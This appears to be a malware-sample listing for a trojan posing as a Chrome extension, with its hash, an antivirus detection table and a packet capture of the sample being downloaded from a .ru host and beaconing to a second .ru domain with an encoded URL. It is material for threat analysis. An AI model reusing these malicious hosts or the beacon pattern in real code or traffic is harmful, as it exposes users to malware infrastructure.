Download Attachments
chrome_extension2
Date added: October 29, 2016 7:16 am
Added by: admin
File size: 26 KB
Downloads: 282
SHA256: b2519cf81b527b2756e3836ed3c6a36b26f30cbb5384fdb1f905f2235207144e
File name: chrome_extension2.exe
Detection ratio: 46 / 56
Analysis date: 2016-10-29 07:07:19 UTC
Engine | Result | Update
ALYac | Trojan.GenericKD.3567426 | 20161029
AVG | Win32/DH{gVQ2JQ?} | 20161029
AVware | Trojan.Win32.Generic!BT | 20161029
Ad-Aware | Trojan.GenericKD.3567426 | 20161029
AegisLab | Troj.W32.Selfdel!c | 20161029
AhnLab-V3 | Trojan/Win32.Gen.N2119271628 | 20161028
Antiy-AVL | Trojan/Win32.SelfDel | 20161029
Arcabit | Trojan.Generic.D366F42 | 20161029
Avast | Win32:Malware-gen | 20161029
Avira (no cloud) | TR/Agent.45837 | 20161028
BitDefender | Trojan.GenericKD.3567426 | 20161029
CAT-QuickHeal | Trojan.Mupad | 20161028
ClamAV | Win.Trojan.Agent-1725685 | 20161029
Comodo | Application.Win32.RuKometa.~E | 20161028
CrowdStrike Falcon (ML) | malicious_confidence_100% (D) | 20161024
Cyren | W32/Trojan.NKAP-2076 | 20161029
DrWeb | Trojan.LoadMoney.1831 | 20161029
ESET-NOD32 | a variant of Win32/RuKometa.E potentially unwanted | 20161029
Emsisoft | Trojan.GenericKD.3567426 (B) |
2016-10-29 01:18:15.191333 IP 192.168.1.102.64195 > 193.238.153.11.80: Flags [P.], seq 0:309, ack 1, win 256, length 309: HTTP: GET /chrome_extension2.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: civdmloqpjp.0qhvmjrq2k.ru
Connection: Keep-Alive
2016-10-29 01:18:15.346432 IP 192.168.1.102.64195 > 193.238.153.11.80: Flags [.], ack 1, win 256, length 0
—
2016-10-29 01:18:29.233943 IP 192.168.1.102.64196 > 185.20.186.52.80: Flags [P.], seq 0:524, ack 1, win 256, length 524: HTTP: GET /%f3%07%27%f6%46%d3%36%86%27%f6%d6%56%f5%56%87%47%56%e6%37%96%f6%e6%62%67%56%27%37%96%f6%e6%d3%33%e2%43%83%62%76%57%96%46%d3%93%56%36%43%23%16%73%36%43%03%03%66%43%03%26%26%93%83%43%36%83%93%73%36%36%16%73%33%03%23%53%16%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
User-Agent: chrome_extension 3.48
Host: g.azmagis.ru
Cache-Control: no-cache